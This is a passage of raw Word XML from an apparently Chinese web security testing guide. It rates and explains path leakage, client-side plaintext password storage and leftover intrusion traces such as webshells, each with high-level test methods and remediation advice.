          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>异常处理模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，对错误页面做统一的自定义返回界面，隐藏服务器版本信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA9003F" w14:textId="2AC1D61C" w:rsidR="00757422" w:rsidRDefault="005E520B" w:rsidP="00501D2E">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不对外输出程序运行时产生的异常错误信息详情。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B21C4C3" w14:textId="0EC30CBA" w:rsidR="00C721EB" w:rsidRPr="00501D2E" w:rsidRDefault="00C721EB" w:rsidP="00C721EB">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58E0F6C" w14:textId="79CD1176" w:rsidR="00757422" w:rsidRPr="00F36038" w:rsidRDefault="00757422" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="127"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc498434475"/>
      <w:r w:rsidRPr="00F36038">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>物理路径泄漏</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="4D22550A" w14:textId="3D09EE2D"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="001026F2" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用中泄露出应用在主机中的绝对地址路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3925359A"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63862E09" w14:textId="6AFE55B3" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="0075257C" w:rsidP="00501D2E">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打开</w:t>
      </w:r>
      <w:r w:rsidR="00075795" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页源代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，查看图片等媒体的链接</w:t>
      </w:r>
      <w:r w:rsidR="00840816" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及超链接</w:t>
      </w:r>
      <w:r w:rsidR="00075795" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CAAD6" w14:textId="184E8EF8" w:rsidR="00075795" w:rsidRPr="00501D2E" w:rsidRDefault="00075795" w:rsidP="00501D2E">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidR="0075257C" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错信息获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F08AC9" w14:textId="10793A36" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00F33033" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析：</w:t>
      </w:r>
      <w:r w:rsidR="00D963CB" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可通过获取网站物理路径，为下一步攻击做准备。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77090B7F"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310AF61B" w14:textId="12C2DDF7" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00B4072D" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：泄露应用绝对路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C90441A"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2098EB78" w14:textId="0B7CDF2E" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00840816" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>媒体链接和超链接采用相对路径的表达方式；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C483F07" w14:textId="5819E6C8" w:rsidR="001E507A" w:rsidRDefault="00840816" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="127"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错信息中不对外输出网站物理路径等敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB1B303" w14:textId="46FBEA93" w:rsidR="00CB0B19" w:rsidRPr="00CB0B19" w:rsidRDefault="00CB0B19" w:rsidP="00CB0B19">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"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5B25C23" w14:textId="0D74733F" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00757422" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLineChars="200" w:firstLine="600"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc498434476"/>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体-简" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明文密码本地保存</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="3EBEC4C7" w14:textId="48981F56"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="001A39AD" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>明文密码保存在本地客户端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484328F" w14:textId="77777777" w:rsidR="00B23A8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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378FEE25" w14:textId="6E948006" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00857A88" w:rsidP="00501D2E">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看网页源代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFD1D7" w14:textId="603B2FF5" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00B23A82" w:rsidP="00501D2E">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看网站在本地客户端的缓存文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDBC22F" w14:textId="128364B7" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00C24790" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00770822" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidR="00F541ED" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可通过嗅探</w:t>
      </w:r>
      <w:r w:rsidR="0062585D" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或直接查看源代码</w:t>
      </w:r>
      <w:r w:rsidR="00F541ED" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方式获取传输到前端的账号及密码，</w:t>
      </w:r>
      <w:r w:rsidR="00E062EE" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录他人账号</w:t>
      </w:r>
      <w:r w:rsidR="0062585D" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB54A74"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F64BFC" w14:textId="528DC87E" w:rsidR="00757422" w:rsidRPr="00501D2E" w:rsidRDefault="00A01A5D" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：全部账号的明文密码保存在本地客户端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E3E499" w14:textId="2451638A" w:rsidR="00A01A5D" w:rsidRPr="00501D2E" w:rsidRDefault="00A01A5D" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>低危</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：只有本账号的明文密码保存在本地客户端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D078AD" w14:textId="6C455544" w:rsidR="00757422" w:rsidRDefault="00757422" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00BF0B3E" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止将密码</w:t>
      </w:r>
      <w:r w:rsidR="000B097D" w:rsidRPr="00501D2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存到本地客户端，即便是加密后的密码也不建议保存在本地，攻击者可利用密文格式的密码登录或修改其他账户的密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4962E4E4" w14:textId="3C13284E" w:rsidR="00CB0B19" w:rsidRPr="000B097D" w:rsidRDefault="00CB0B19" w:rsidP="00501D2E">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1690031B" w14:textId="2203DC77" w:rsidR="00757422" w:rsidRPr="00F36038" w:rsidRDefault="00757422" w:rsidP="001365A8">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc498434477"/>
      <w:r w:rsidRPr="00F36038">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入侵痕迹残留</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="3243A688" w14:textId="1FB8C084" w:rsidR="00757422" w:rsidRPr="003E7C1D" w:rsidRDefault="00757422" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00CE5A48" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在渗透过程中发现应用中存在曾经的入侵痕迹，如存在的</w:t>
      </w:r>
      <w:r w:rsidR="00CE5A48" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="00CE5A48" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidR="00D10780" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23491918" w14:textId="705B5185" w:rsidR="00757422" w:rsidRPr="003E7C1D" w:rsidRDefault="00757422" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="0081503F" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常使用</w:t>
      </w:r>
      <w:r w:rsidR="0081503F" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="0081503F" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全漏洞扫描工具或目录扫描工具发现入侵痕迹。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE2242C" w14:textId="13B6E310" w:rsidR="00757422" w:rsidRPr="003E7C1D" w:rsidRDefault="00C24790" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00757422" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00EF4E26" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>残留的入侵痕迹可被其他攻击者用于二次攻击，对网站造成一定的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34927DCF" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="003E7C1D" w:rsidRDefault="00757422" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F12F29" w14:textId="61646FD6" w:rsidR="00757422" w:rsidRPr="003E7C1D" w:rsidRDefault="00E9431C" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：发现存在入侵痕迹，比如存在</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Webshell</w:t>
      </w:r>
      <w:r w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者网页被篡改</w:t>
      </w:r>
      <w:r w:rsidR="00DD3579" w:rsidRPr="003E7C1D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DCCC22" w14:textId="2EDB45B4" w:rsidR="00757422" w:rsidRDefault="00757422" w:rsidP="00501D2E">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
